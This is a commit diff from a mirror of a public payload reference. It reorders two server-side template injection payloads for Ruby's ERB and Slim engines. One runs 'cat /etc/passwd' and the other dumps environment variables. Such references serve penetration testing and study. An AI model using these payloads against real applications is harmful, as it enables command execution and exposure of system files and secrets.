mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00
Sorting like basic injection part
This commit is contained in:
parent
7f1fb32980
commit
712e3b93f6
@ -91,17 +91,16 @@ Slim:
|
|||||||
|
|
||||||
### Code execution
|
### Code execution
|
||||||
|
|
||||||
Execute code using SSTI for Slim engine.
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
#{ %x|env| }
|
|
||||||
```
|
|
||||||
|
|
||||||
Execute code using SSTI for ERB engine.
|
Execute code using SSTI for ERB engine.
|
||||||
|
|
||||||
```ruby
|
```ruby
|
||||||
<%= system('cat /etc/passwd') %>
|
<%= system('cat /etc/passwd') %>
|
||||||
```
|
```
|
||||||
|
Execute code using SSTI for Slim engine.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
#{ %x|env| }
|
||||||
|
```
|
||||||
|
|
||||||
## Java
|
## Java
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user